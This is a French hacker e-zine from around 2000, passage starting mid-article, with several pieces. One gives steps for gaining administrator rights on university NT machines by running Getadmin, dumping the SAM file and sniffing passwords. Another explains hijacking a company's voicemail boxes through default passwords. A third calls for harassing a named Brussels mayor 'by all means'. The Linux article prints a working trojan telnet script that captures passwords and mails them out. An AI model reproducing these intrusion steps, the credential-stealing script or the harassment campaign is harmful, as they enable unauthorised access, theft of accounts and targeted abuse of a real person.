GetNumer = 3
Case "Q"
GetNumer = 7
Case "R"
GetNumer = 18
Case "S"
GetNumer = 19
Case "T"
GetNumer = 15
Case "U"
GetNumer = 21
Case "V"
GetNumer = 16
Case "W"
GetNumer = 3
Case "X"
GetNumer = 8
Case "Y"
GetNumer = 2
Case "Z"
GetNumer = 56
Case Else
GetNumer = 0
End Select
End Function

Vous voyez que la fonction GetNumer est exactement la mme que celle en 
assembleur du programme. Les lettres 
majuscules et minuscules recoivent la mme valeur, et certaine lettres ont 
galement la mme valeur. J'ai mis 
le KeyGen compil dans le zip pour ceux qui n'ont pas VB (beaucoup d'entre vous 
normalement)(comment ca non !?! ;-). 
S'il n'y est pas, aller voir sur le site de Zone14, ou demander-le  
<a onmouseover="window.status='Add grima@hotmail.com to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=grima@hotmail.com&nf=0">grima@hotmail.com</a>.

Voil qui termine nos aventure pour aujourd'hui, mais point d'inquitude, i'll 
be back soon... 
Je ddie ce crack  Synt, paske j'ai gagn notre paris ;-)... About, je voudrais 
dire ma grande
dception et ma profonde tristesse par rapport  la fermeture de MadChat. La 
scne vient d'en 
prendre un coup, mais pas d'inquitude, nous sommes tous l pour continuer et 
persverer pour
faire un monde meilleur... Sur ce, bye all... 

GRIm@ , l'Apprenti Sorcier

-------------------------END CUT - END CUT - END CUT 
-------------------------------

8) Adresses utiles

Quelque adresse qui servent:
<a target="new" href="http://Zone14.cjb.net">http://Zone14.cjb.net</a>                      C'est mon groupe (pub!)
<a target="new" href="http://protools.cjb.net">http://protools.cjb.net</a>                    Tous les outils pour cracker !!!
<a target="new" href="http://www.multimania.com/christalpage/">http://www.multimania.com/christalpage/</a>    Le site de +Christal avec plein de 
truc sur
                                           les anti-softice...

9)END

Bon aller on se quitte, mais snif, ne pleurez pas, je reviendrai encore dans le 
n4... Dj
prvu: Les outils, dboguage avec WDASM, compression + cryptage, structure des 
EXE (PE header)
puis ptt un truc sur les protec commerciales... Sinon, ben bonne chance, et 
n'oubliez pas de
lire beaucoup pendant les vacances ;-)... Pour finir, cette petite phrase que je 
repique de je
ne sais plus ou: "Ne finissez jamais de commencer  apprendre, et ne commencer 
jamais  finir
d'apprendre !"

#EOF CRACKING_BEGINNER n03 26-06-2000

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


	*****************
	* Hack your Fac *
	*****************

Auteur : Cyrius

ThE HaCkeR CyRiUsViRuS
cyriusvirus@yahoo.fr


Le materiel necessaire est :-Un account sur une becanne de la fac..
				    -Une becanne avec Unix et/ou NT.. (Si vous 
avez pas NT c'est pas la peine...)
                            -Une legere connaissance des OS..                         
				    -Une conscience..

Je vais vous expliquer comment obtenir les acces Admin de votre Fac sous 
NT .

I . Le Password Admin Local sous NT
	1. Details sur NT
	NT est en theorie un systeme d'exploitation beneficiant de la 
certification C2. Ce qui signifie qu'il est au plus haut point de 
securite possible des OS. J'ai bien dit en THEORIE ;)
	Il y a plusieurs composants tres interressants dans NT. Le 
LSA(Local Security Authority) qui gere les login et les audits. Le SAM 
(Security Account Manager) qui contient les passwords et les donnes au 
LSA. Enfin le SRM (Security Reference Monitor) qui genere les messages 
d'audits et renforce la securite du LSA.
	Qu'est-ce qu'un audit, vous me direz... Un audit et un executable 
que l'Admin lance sur certains fichier, programmes ou repertoires, et 
qui notte qui a utilise ce fichier et pendant combien de temps.
	Il n'y a pas que l'audit qui est tres chiant; y'a aussi les 
Service Packs... Ce sont des programmes qui sont crees par MS pour 
corriger des bugs dans NT qui pourraient constituer des trous de 
securitee. Au jour ou j'ecrit ce texte, le SP4 vient de sortir. Enfin je crois qu'il y a pas si longtemps.

	2. Passwords sous NT
	Le password est contenu dans un fichier nomme SAM. Ce fichier 
existe en plusieurs exemplaires. Celui qui est utilise par NT est le 
fichier SAM (ou Sam.log) situe dans le repertoire 
WINNT\SYSTEM32\CONFIG\SAM. Le probleme est que ce fichier est utilise 
par NT et donc illisible avec NT demarre!!! Mais pas de probleme car NT 
est pas intelligent et a peur de le perdre; c'est pourquoi il le 
sauvegarde dans un fichier sam.sav. Il existe aussi le fichier Sam_ qui 
contient le pass Admin au moment de l'installation mais si l'admin est 
pas trop con il l'aura change....

	3. Passer Aministrateur sous NT en local
	Ca peut etre tres pratique pour installer des progs qui demandent 
d'etre Admin...
		a) La Solution Getadmin
	Pour passer root sous NT il y a plusieurs solutions biensur. La 
premiere est d'utiliser un exploit nomm Getadmin.exe. Le probleme est 
que cet exploit est patche par le Service Pack 3. Mais mais mais, il y a 
toujours une solution, elle se nomme Crash4.exe. Ce dernier programme 
est a utiliser si le SP3 est installe sur votre machine, il remet en 
place quelques trucs dans la pile de NT et autorise l'utilisation de 
Getadmin.exe. Comment savoir si le SP3 est installe? C'est tres simple, 
il vous suffit de le copier dans le repertoire  c:\temp (vous y avez les 
droits ;) avec son DLL GASYS.DLL et executez le en tapant getadmin GUEST 
(ou tout autre compte que vous voulez passer en root). Si ca marche pas 
de probleme sinon il vous faudra executer Crash4.exe et ensuite 
reexecuter Getadmin.
		b) L'extraction du fichier Sam
	Une autre solution bien plus amusante est de chopper le password 
Administrateur. Pour cela on va recuperer le fichier Sam... Le probleme 
est que ce fichier est utilise par NT et donc il est innaccessible. Il y 
a toute fois une solution. Elle consiste a booter sur une disquette 
(donc sous DOS) et de monter la partition NTFS grace a un programme nomme ntfsdos.exe. Ce programme permet de monter la partition 
NTFS et donc de pouvoir lire dessus sans aucune restriction habituelle. 
On pourra donc recuperer le password Admin et le cracker ensuite. Mais 
avant il faut le dumper car il est code. Pour cela il faut utiliser 
Pwdump.exe ou Samdump.exe, le fichier est ainsi lisible (mais le pass 
est toujours crypte). Une autre solution pour le dumper est d'utiliser 
le cracker de passwords L0pthcrack. Vous devrez de toute facon passer 
par ce prog car c'est le meilleur cracker de pass NT que je connaisse.
Ca prendra surement du temps mais ca vaut le coup ;)

II . Le password Admin sur le reseau
	Pour ce pass faudra gruger un peu (reflechir en bon francais...). 
La config de votre reseau est tres importante vous vous en doutez. Le 
mieux c'est d'avoir un reseau Ethernet. Plusieurs solutions se 
presentent alors a vous : sniffer au moment du login ou sniffer au 
moment de la recuperation des mails.
Pour sniffer au login rien de plus simple, il vous suffira d'utiliser 
encore une fois L0phtcrack. Le dernier en date, le 2.51 l'integre 
graphiquement. c'est trop fun non??? Alors vous le lancez et vous 
attendez. Perso je n'ai pas teste la derniere version mais dans les 
versions precedentes leur prog readsmb marche tres bien, on peut donc 
esperer qu'ils n'ont pas regresse... Le probleme de ce systeme est que 
l'on devra cracker quand meme les pass. En effet, NT transmet les 
passwords sur le reseau (de la station vers le serveur) mais ce con les 
transmets cryptes... Ceci dit c'est deja pas mal et ca peut etre 
extremement pratique!!!
	La deuxieme solution est si vous avez un serveur de mail de 
sniffer les echanges avec ce serveur. Le service POP3 de NT n'est pas 
securise et les pass sont transmis sans etre codes ;) et la on se marre 
reellement mouahahahah. Installez le sniffer entre le serveur NT et le 
serveur de mails... Et voilou. Pour cela je ne saurais trop vous 
conseiller le programme sniffit qui tourne sous Unix et qui est a mon 
avis Le meilleur sniffer existant. Testez le et vous verrez.
	Bien sur si l'admin n'est pas trop CON, vous n'aurez jamais sont 
pass meme en crypte (faut pas rever quand meme). Ceci dit les admins sot 
parfois tres cons!

	Attention ne revez pas, ce n'est pas fini. Car si vous voulez 
reellement le password Administrateur (petit defi perso), il vous faudra 
utiliser par exemple (encore une fois) L0phtcrack. ET OUI!!! Pour ce 
faire vous devrais, avec des droits admin normalement, modifier dans la 
base de registre une variable pour pouvoir par la suite recuperer tous 
les passwords de votre reseau. La cle est 
HKEY_CURRENT_USER\Software\LHI\L0phtCrack\AdminGroupName . Vous devrez 
mettre le login Administrator dans votre langue ( vue qu'on est 
francophones : Administrateur). Une fois que vous aurez fait cela vous 
pourrez dumper la base de registre. Pour cela une option est presente 
dans le menu tools :Dump password from registry.
Et la le miracle de Microsoft se revele a vous... La liste complete des 
passwords (a cracker bien sur mais ...). Au fait si votre version de NT 
est en Anglais pas besoin de sniffer!!! Heureusement que je vous le dit 
hein!!!

	Donc voila, je crois bien que j'ai fini. J'espere ne pas vous 
avoir trop fait chier en racontant toutes ces conneries et j'espere 
surtout que ca vous servira bien. Faites bien chier tous ces cons 
d'administrateurs NT.



             \ _://                         \\:_ /
            _)\\//(_                       _)\\//(_                      
---------- \\_o\/o_/      CyRiUsViRuS      \_o\/o_// ----------
             ||||||          2000           ||||||
             '||||'                         '||||'
                           CyriuSoft (c)

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________



     **************************
     * Vidage de la pile CMOS *
     **************************

Auteur : tRaSH

     -vidage de pile CMOS : Ouah, jen reviens pas je viens de sauver mon pc de 
la casse ! Javais dj des 
problmes avec (carte son qui marche une fois sur 5, destruction de LILO sans 
raison, ) mais a ce point, jamais. 
Jinstallais les drivers pour ma carte son et quand il redmarra (il ne sait pas 
le faire seul, il faut appuyer 
sur reset  sinon il bloque) lcran du  BIOS avait change OK, jusque l, ca 
va. Mais les choses se corsrent 
quand  le dmarrage se bloqua sur checking nvram.
     Plus moyen de dmarrer, il bloquait au niveau du BIOS. Pas moyen de : 
parvenir au BIOS, lancer linux ou 
windoze mme avec une diskette de boot, aprs une journe a rflchir, jai 
pense  une astuce, retirer la pile 
du CMOS, pile qui garde tous les paramtres du BIOS une fois le PC teint. Cette 
pile se trouve sur la carte mre, 
pour lenlever, jai du enlever 2-3 cartes PCI. Elle ressemble  une pile 
normale (en fait, cest une pile comme 
toute les autres, une pile cr2032, mais oui, les grosses rondes, plates) et se 
trouve souvent a cote des ports PCI.
Il faut empcher un des deux ples de toucher les contacts. Et voil, le BIOS 
est revenu  sa config par dfaut, 
il faut juste tout reparametrer. Avantages : plus de password, plus de 
bugs,Inconvnients : tout reconfigurer, 
parfois a ne marche pas : il se peut que le BIOS soit partiellement ou 
entirement dtruit, alors il faudra le 
reflasher avec un diskette.
Souvent, on trouve sur les sites de fabriquants des progs a placer sur diskette 
pour flasher son BIOS. Attention, 
flasher un BIOS nest pas chose facile. Si vous ne savez toujours pas dmarrer 
(plus de BIOS du tout), il vous 
faudra alors trouver qqn qui a  peu prs la mme carte mre que vous, lui 
emprunter son BIOS (en prenant son 
EEPROM BIOS) afin de la mettre [provisoirement] dans votre bcane. 
OK, votre bcane a dmarre, et aprs votre copain est dans la merde car il a 
plus de eeprom ok, activez loption 
 cache system bios  dans le bios (celui du copain) et une fois dmarrer votre 
bcane, enlevez le bios du copain 
pour le remplacer par le vtre (le tout casse), vous pouvez alors le flasher, le 
configurer, a oui, dernier conseil, 
noubliez pas de rendre leeprom a votre copain !
Chtite question : que veut dire BIOS ?
Chtite rponse : basic input/output system

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________



     *************************************
     * Mode d'emploi de la VMB Igloo Ola *
     *************************************

Auteur : nada

Cet article etait en fait un email envoye par nada  Asmodeus pour expliquer le 
fonctionnement de la VMB.

     Je vais t'expliquer le fonctionnement dtaill de cette VMB qui est bien 
belge. Il y en a certaines 
qui sont en franais, d'autres en flamand et certaines en anglais.

     N de tlphone : 0800/99707 (igloo-ola, service consommateur)
Si cest un rpondeur (welcome bij igloo ola...) cest bon, on continue. Si 
cest quelquun qui parle (allo ?) 
cest pas bon, il faut ressayer plus tard. Donc, si cest un rpondeur, on 
appuie sur *. Une femme parle, on appuie 
sur #. L, a demande un n de bote vocale. Ceux-ci sont en quatre chiffres. Si 
on tombe sur une bote dj occupe 
(a dit un nom) alors faut essayer un autre n, le but tant de crer une bote 
bien  nous. Si quand on a donn le n,
a nous explique ce quest un service de messagerie, cest bon, on a russi a 
trouv un nouveau n qui ntait pas 
encore attribu. 
Malheureusement, certaines botes sont en nerlandais, cest pour a que 
jexplique le fonctionnement dtaill de la 
bote. L, elle va demander le mot de passe temporaire. Cest toujours le n de 
la bote (sauf boite 9999 et 9998, 
ils ont chang :( ) (ex : bote 5555, mot de passe provisoire : 5555). On le 
tape puis on appuie sur #. Maintenant 
elle demande que lon donne un nouveau mot de passe. On le tape puis on appuie 
sur #. Puis elle demande notre nom, 
on le dit puis sur # comme dhabitude. Aprs elle nous demande des options dont 
on a rien a foutre pour linstant 
(ce quon veut cest crer une bote) donc on dit quon veut garder le message 
du systme. Maintenant, elle nous
dit un truc dans le genre :  vous navez pas de nouveau message .
GENIAL ! ! !, on a notre bote  nous tout seul !
Voici les options une fois quon est dans la bote.

1 : couter les nouveaux messages (si il y en a)
pendant qu'on coute le message, on a des options qui peuvent tre pratique dans 
le cas o le mec articule pas!
     1 : reculer de 10 secondes dans le message
     2 : pause (rappuyer sur 2 pour continuer)
     3 : avancer de 10 secondes
     4 : aller moins vite  :trs pratique ;)
     5 : renseignement sur le message
     6 : aller plus vite
     7 : volume moins lev
     8 : volume normal
     9 : volume plus lev
on coute puis aprs on a comme choix
     7. effacer le message
     8. rpondre au message
     9. archiver le message
     0. plus doptions
     4. rcouter le message
     5. renseignements sur la provenance du message et lheure
     *. annuler
2 : envoyer un message       l elle parle et aprs le bip il faut dire son 
message puis appuyer sur #. Ensuite il faut 
donner le numro de la bote  laquelle on veut envoyer le message puis sur # 
pour lenvoyer immdiatement. A la place
on peut appuyer sur 0 pour des options avances :
     0. options avances.
     1.     ajouter la mention confidentiel au message
     2.     ajouter la mention urgent au message
     3.     obtenir la confirmation du message
     4.     exiger une transmission diffre.
     * annuler destination
3 : contrle des messages envoys  une certaine personne (cest pour savoir si 
elle a bien cout tous nos messages)
4 : options personnelles :
     1.fonction davis de message ON/OFF
     2.gestion
          1.tablir ou modifier des mots de passe.
          2.tablir ou modifier des listes de distribution de groupe
          3.changer le niveau du menu guide.
     3.message daccueil
          1.modifier le message daccueil personnel
            2.crer un message dtaill dabsence prolonge
          3.enregistrer son nom.
          4.option dappel
          1.tablir le 1er horaire.
          2.tablir le 2me horaire.
          3.tablir un horaire provisoire.
5 : redmarrer la session
6 : non attribu
7 : non attribu
8 : couter le n de notre bote vocale
9 : fonction du responsable du systme :
     1.message  diffusion gnrale du systme
     2.message daccueil du systme.
     3.message de fin de session du systme.
     4.attribuer un nom  des listes de diffusion ou en crer une nouvelle.
     5.affecter un nouveau nom  un point nodal


     Le zro (0) sert toujours soit  faire rpter soit  demander des 
explications.
     Ltoile (*) sert toujours  revenir en arrire  annuler ou  quitter.

Trucs pour trouver un numro de botes :

     -ils sont en quatre chiffres. La femme nous prvient si on sest tromp 
aprs 3 chiffres. Exemple : 
je tape 632 et elle dit numro incorrect, je peux donc supprimer toutes les 
botes de 6320  6329 inclus. Simple non ?
Pour ne pas devoir recommencer  chaque fois aprs 3 numros de botes invalides 
conscutifs, il suffit dintroduire 
un numro de bote qui est valide aprs 2 essais et de taper * quand elle 
demande le mot de passe. Ainsi on peut 
recommencer sans se faire raccrocher au nez. Quand on tient un bon numro (la 
femme nous explique ce quest une bote 
vocale), pour aller plus vite, il suffit de taper le numro de la bote vocale 
suivi du # puis le nouveau mot de passe
suivi du # puis a fait bip, donc on dit son nom et on appuie 2 fois sur # pour 
confirmer. Aprs on appuies sur 1 
sur # puis sur 2. Voil, on a cr la bote vocale.
En rsum, a fait :               Numro de la bote 
                     mot de passe provisoire #
                     Nouveau mot de passe
                     Bip : nom # #
                     1 # 2

La boite de Nada : 6415
La boite d'Asmodeus : 6729
La boite de GrIMA : 6754
Voici des numros de boites :
6270
6280
6394
6399
6338
6202
6201
6729 ---&gt; la mienne &lt;----
6669
6397
6458
6433
6415 ---&gt; Nada &lt;---
     Je sais pas si ils marchent encore tous parce que j'avais tellement foutu 
le bordel qu'ils ont tout 
rinitialis mais bon, il y en a qui marche, c'est sr. Amuse toi bien. 
@+     nada

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


	********************
	* Les codes-barres *
	********************

Auteur : CyriusVirus

Me revoila. Cet article a pour but de vous apprendre a cracker les codes barres a 13 chiffres qui sont les plus utiliser en Europe.
Tout d'abord, un code barre ne contient pas le prix du produit mais un numero qui qui fait reference au produit
Bons voyons voir comment sont codes ces codes barres (je part du numero completement a gauche) :

0 a 1 : origine du produit
2 a 11 : le code du produit
12 : le checksum


Le checksum se calcul facilement :
A=somme des chiffres en position paire (le chiffre a l'extreme gauche est le numero 0).
B=somme des chiffres en position impaire*3

checksum= 10- [(A+B) mod 10] ou 0 si [(A+B) mod 10]=0


Un chiffre est representer par 7 barres, il s'agit biensur de son ecriture binaire (noir=1 blanc=0).
Cepandant, il ne suffit pas de traduire directement les chiffres en binaire puis de les afficher sous forme de barres (sinon pas besoin de 7 barres 2^7=128).
En effet , ils sont codes sinon ca serait trop simple.

Un code barres presente 2 parties separees par 5 barres plus longues que les autres, elles apparaissent apres le numero 6 (a partir de 0), il y a egalement des barres plus longues sur les cotes du code barre, voici comment elles sont codees :

COTES: 101 {Tout cela en binaire}
CENTRE: 01010
Ces barres sont importantes car elles permettent de calibrer le scanner. de plus, il doit y avoir un espace blanc de 10 fois la taille d'une barre sur chaque cotes du codes barres (c'est important).

Quqnt aux chiffres, il ya 3 tables pour les coder. Sur la moitie droite, tous les chiffres utilisent la table C
Sur laa moitie gauche, les chiffres sont codes avec la table A et B selon une configuration determinee par le chiffre en position 0.
Voici les tables:

     TABLE A       TABLE B       TABLE C
0:   0001101 (13)  0100111 (39)  1110010 (114)
1:   0011001 (25)  0110011 (51)  1100110 (102)
2:   0010011 (19)  0011011 (27)  1101100 (108)
3:   0111101 (61)  0100001 (33)  1000010 (066)
4:   0100011 (35)  0011101 (29)  1011100 (092)
5:   0110001 (49)  0111001 (57)  1001110 (078)
6:   0101111 (47)  0000101 (05)  1010000 (080)
7:   0111011 (59)  0010001 (17)  1000100 (068)
8:   0110111 (55)  0001001 (09)  1001000 (072)
9:   0001011 (11)  0010111 (23)  1110100 (116)

(dans la table A, 0 correspond a 13, dans la B 0 a 39...)

Voila la facon d'utiliser les tables pour la premiere
moitie du code barre en fontion de la valeur du numero 0 ( la seconde moitie est code avec la table C):

       #1     #2    #3    #4    #5    #6
0      A      A     A     A     A     A
1      A      A     B     A     B     B
2      A      A     B     B     A     B
3      A      A     B     B     B     A
4      A      B     A     A     B     B
5      A      B     B     A     A     B
6      A      B     B     B     A     A
7      A      B     A     B     A     B 
8      A      B     A     B     B     A
9      A      B     B     A     B     A 


Bon, pour ceux qui comprenne toujours pas voici un exemple :

Le code barre est : 9782501 02186 9<--checksum

Calculons le checksum:

somme des chiffres en position paires=9+8+5+1+2+8=33 (il ne faut pas calculer le dernier qui est le checksum!!)

somme des chiffres en position impaires=7+2+0+0+1+6=16
on calcul (33+16*3) mod 10=1 (mod 10 revient a faire une division  et prendre la reste  comme resultat)
d'ou checksum= 10-1=9 donc c'est bon.
De plus,le numero 0=9 donc les chiffres 782501 sont codes comme ce ci : ABBABA et les autres utilisent la table C.
Oui,Oui je sais que c'etait difficile pour ceux qui n'ont jamais fait l'umaniter ou la 6eme pour les francais. 

Voila vous avez appris le fonctionnement des codes barres. Je trouve que c'est plutot cool.
Sachez qu'il existe  d'autres type de code barre que je connais pas encore. 



Outro	
Le moment est venu de faire des greetings. Alors je commence (ca 
sera pas long) par Asmoseus qui m'encourage toujours pour faire des articles.
Grim@ et tout les autres membres de BHZ.

 FUCK WHIS THE BEST DIE LIKE THE REST   :-))))))

[ND Asmodeus][ And stop watching shit moviez aussi hein Cyrius... ]   





             \ _://                         \\:_ /
            _)\\//(_                       _)\\//(_                      
---------- \\_o\/o_/      CyRiUsViRuS      \_o\/o_// ----------
             ||||||          2000           ||||||
             '||||'                         '||||'
                           CyriuSoft (c)

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________



     **************
     * L'Intelink *
     **************

Auteur : nada

     -lIntelink : qui connat lIntelink ? Je crois que pas beaucoup de gens 
(en dehors de la CIA) connaissent 
lIntelink (moi-mme le connat depuis que je suis tomb sur une demo sur le 
site www.topsecretnet.com, cest  dire
pas longtemps). Et pourtant, cest quelque chose de trs grand ! Pour vous faire 
une ide, cest une sorte de 2eme 
internet, un intranet gigantesque rserv au militaire et au gouvernement 
amricain (pour changer) contenant des 
millions dinformations sur tout : guerre, terrorisme, personnel, Pour y 
accder, il faut travailler dans le 
gouvernement ricain, a nimporte quelle chelle : flics comme snateurs y ont 
accs. 
Anecdote : Monica Lewinsky y a eu accs en tant que top Secret/SCI  Sensitive 
Compartiment Information, 
compartiment dinformations sensible : cest le plus haut niveau que lon peut 
atteindre et cest en tant comme 
secrtaire a la maison blanche quelle la atteint (entre deux relations 
presidentielles ?). LIntelink est, comme 
le net, base sur du tcp/ip et est fait comme internet : avec des serveurs 
(tournant sous apache,... ), un browser, 
mme des acomptes FTP, un vrai internet autonome. Et oui, il est coupe du net, 
aucun contact (enfin, cest ce que 
les sites disent, peut-tre que). Pour y avoir accs, il faut accder  une 
borne (emprunte digitale et tout et tout)
ou connatre le numro du serveur ainsi que les pass, extra-securis mais 
hackable (nul nest parfait !) Ce quil 
faudrait, cest trouver qq. Qui se connecte et lui voler la connexion 
(beige-box), mais APRES disons 15 a 20 minutes 
car il y a plusieurs niveaux didentifications, pas intrt a tomber  ce moment 
l.
Point de vue technique : 
protocole : tcp/ip, FTP, telnet, 
Langage : html
Rseaux : SPIRNet, JWICS,  a peu prs tous les rseaux de la scurit
Moteur de recherche : 6 : AltaVista, FBIS, par Meta-Search , Slick, Webinator, 
Werzit
Identification : two-way 
challenge/response : identification simultane du serveur et du Client
Carte PCMCIA : contenant des infos (niveau daccs, nom, identification,...)  
hautement cryptes (pas un XOR de mes 
couilles, quoi). Le cryptage est constitue par une puce Capstone/Keystone qui 
inclut les algorithmes DSS, SHA-1, 
SES et le KEA. 
(DSS=digital signature Standart, SHA-1=secure hash algorithm, SES=Skipjack 
encryption standart, KEA=Key 
exchangeAlgorythm. 
Le tout constitue le Fortezza. A peine le fortezza sortis, on parle dj du 
fortezza plus. Pour activer 
la carte, il faut entrer un code Pin de 12 chiffres. ARGH
Restriction : end-to-end confidentiality : niveau daccs diffrent dun 
utilisateur a lautre, un peu comme un 
FTP o un root na pas les mme droit quun anonyme
Chat : et oui, il y en a o on ne parle que de guerre, stratgie, 
Comme vous pouvez le constater, cest pas rien et completement coupe du net pas 
de passerelle, RIEN !NADA !
Voil a peu pres tout ce que je sais en la matiere, faut dire que la NSA ne 
laisse pas beaucoup filtrer ses 
infos et tout est garde secret dans leur ville (avec leur usines, bouffe,...) Au 
fait, la devise de la NSA ne 
serait-elle pas servir en silence  ?

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


     *************
     * Hack defi *
     *************

Auteur : tRaSH

     J'organise peinard un meet avec Asmodeus (www.thebhz.org  ;-))et vient la 
question du lieu ! Je pense a 
Bruxelles avec ses gares, trams, bus, metros, et en plus c'est la capitale de 
l'Europe et de la Belgique. Je me 
renseigne et j'apprend que les rassemblement de plus de 3 personnes sont 
interdits... 
     Comment ca interdit ? C'est le retour du faschisme au pouvoir ou quoi ? En 
fait, le bourgmestre de 
bruxelles ville (Baudouin xavier de donnea) a interdit les rassemblements de 
plus de 3 personne. Attention, il ne 
faut pas confondre personnes et personnes, un groupe de 25 touristes Japonais 
seront accepte avec tout les honneurs 
par contre un "rassemblement" de 4 personnes d'un nationalite qui ne plait pas 
aux flics (souvent des personnes 
d'origine immigres) seront controles (papiers, ...) puis enmene au comissariat 
de police le plus proche ! Je les 
ai vus a l'oeuvre, c'est pas rien ! leurs controles" sont assez.....agites ! 
     En bref, la politique de donnea est simple : enfermer les elements 
"salissant la ville" selont ses propos.
En clair tout ce qui n'est pas Belges, ne possedant pas un appareil photo et 
etant a 6/7 sera controle par les flics. 
C'est du faschisme pur et dur !  
Les flics de bxl ne sont pas mieux, l'Euro 2000 a ete une bonne occasion de 
lacher tout le faschismeet la violence 
qu'ils ont en eux, tout en accusant les hooligans ils ont pus taper tout ce 
qu'ils voulaient pour se defouler. 
On peut croire que je delire mais c'est vrai, la preuve que ca gene les flics 
que certaines personnes s'en rendent
compte : j'en parlait peinard avec un pote (on etait dans un centre commercial) 
et ont est passes devant une sorte
de petite case-a-flics o un keuf narrait ses exploits avec son costume de 
Robocop (mais oui, les 2 milliards 
d'investis, c'etait principalemnt pour ca) et nous a entendus. On continue et 
(ont tournait un peu en rond dans 
le centre commercial) se retrouve devant nous (dans le mme sens de marche). Il 
s'arrete net ds que je dis 2 
milliards (LE chiffre fatidique) et me devisage. Je continue et il fait semblant 
de rien en regardant une vitrine
 ...ok. 
     Ds qu'il arrive derriere nous, il recomence a marcher en nous suivant 
pendant au mois 50 metres (a peine
discret, le bourin koi...)on sort du centre et ont va s'assoir un peu plus loin 
sur un rebord juste derriere un 
coin ou il sufisait que je penche la tte pour voir l'entree du centre 
commercial. Il est reste l pendant 15 
minutes a nous regarder (ne pouvant rien faire puisque son devoir etait de 
rester DANS le centre commercial et 
ne pouvant pas effectuer d'arrestaion en dehors), ont a trace a l'oppose pour 
pas se faire choper. bref, il 
essayait de nous filer pour nous choper mais a foire !      En bref, les flics 
n'aiment pas trop que l'on se rendent 
compte du fin fond de l'histoire et preferent que les hooligans soit tenus pour 
responsable de tout ce bordel... 
Tiens, simple question, que vont-ils faire des tenues robocop et de leur 
lance-grenade fumnigene, ne risquent on 
pas de les retrouver dans des manif' (par le plus grand des hasards) ? Alors, 
hack donnea est une operation que 
j'ai lance, le but est de faire chier a max de donnea par tout les moyens : 
hack, phreak, ...
Il faut qu'il en chie a MORT !
Le gagnant sera recompense par...rien a part la satisfaction d'avoir fait chier 
un connard, faschiste.
A vos armes, prt, FEU, DESTROYEZ LE, QUE SA MAISON EXPLOSE, QUE SA FEMME 
DIVORCE, QUE SON CHIEN SE FASSE ENLEVER, ...
debut de l'opperation : 10 septembre 2000, jusque l, envoyez nous les infos que 
vous avez sur lui. 
nom : De Donnea
prenom : Baudouin Xavier
Bourgmestre de Bruxelles
 
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


	*******************************
	* Securiser son systeme Linux *
	*******************************

Auteur : Asmodeus

	Cet article va tenter de decrire les differents types d'attaque que votre systeme peut subir et les differentes manieres de s'en proteger. En gros, un attaquant peut avoir les deux objectis suivants : soit s'introduire dans le systeme (une intrusion) soit le faire planter.
	L'intrusion : l'attaque n'a pas besoin d'etre tres sophistiquee quand l'attaquant a acces  un hote mal configure ou configure par defaut. Avec un simple scanneur de ports si il voit que, par exemple, votre port ftp est ouvert, il pourra tenter de se connecter l dessus avec les comptes root, guest, test, satan, etc... La premiere protection consiste donc  choisir des mots de passe qu'un attaquant ne purra decouvrir en devinant ou en se servant d'un dictionnaire.
	Attaque par des programmes : un attaqsuant peut se servir  d'un programme pour avoir acces  votre systeme. 
	Le moyen le plus courant actuellement c'est de provoquer des buffer overflows (depassement de tampon) : des qu'un programmeur oublie de fixer une limite superieure aux donnees entrantes dans son programme.
	Une autre facon de se faire hacker c'est d'attribuer des autorisations qui ne conviennent pas : par exemple autoriser un fichier  etre execute avec le bit SUID alors que tous les utilisateurs peuvent y ecrire. 
	De nombreux programmes sont vulnerables. Consultez les sites http://www.rootshell.com, http://www.security-focus.com, http://www.cert.org, etc... pour des explications sur les faiblesses des programmes et des conseils pour les securiser.
	
	Les programmes cheval de Troie : j'ai dej explique dans BHZ Mag n 4 comment, en modifiant le PATH dans le login ou dans le fichier .profile on pouvait recupere le mot de passe d'un utilisateur.
Extrait de l'article :
	Par exemple un etudiant ouvre une session sur son compte puis quitte son poste. C'est la que le hackeur arrive : il a acces au compte du branleur.Sans connaitre le mot de passe mais
sachant que la victime est un etudiant.Le hackeur peut modifier le PATH dans le login ou dans le fichier .profile du branleur:

PATH=/usr/bin:/bin:/usr/local/bin:/sbin:/usr/bin:/usr/local/bin:/usr/X11R6/bin

Apres ce changement la commande PATH est executee dans le premier repertoire.
Si la commande est introuvable,le processus mis en place cherche dans le
repertoire suivant...Maintenant reflechissons un peu : il suffit de creer un
script,l'appeler telnet et l'inserer dans le reprtoire home de la victime.
Script qui permettrait d'avoir le mot de passe de la victime/branleur.Apres
avoir cree ce fichier,il faut fermer la session sans que personne ne s'en
rende compte (evitez de faire ca sur le poste a cote de l'admin...) Voici donc
un exemple de script cheval de Troie:

#! /bin/sh
#Trojan Telnet by Asmodeus session
echo "Trying $1...."echo "Connected to $1."echo "Escape character is /'^]\',"
echo " "
echo "Linux 2.0.34."
echo " "
echo $1login: "
read ID
echo "password: "
read PW
echo "Login incorrect."
echo "User $ID ands password $PW" | mail asmodeus@mail.be
rm $0
kill -9 $PPID

Ce script ressemble au programme reel (sauf qu'il ne boucle pas trois fois
parce que j'ai pas envie de me faire chier..);le bete utilisateur croit que
c'est le vrai programme,le programme(le faux) m'envoie le nom et le mot de
passe par e=mail puis le programme se suicide...(rm $0) et tue aussi son
processus (suicide collectif ;=) ) (kill -9 $PPID).

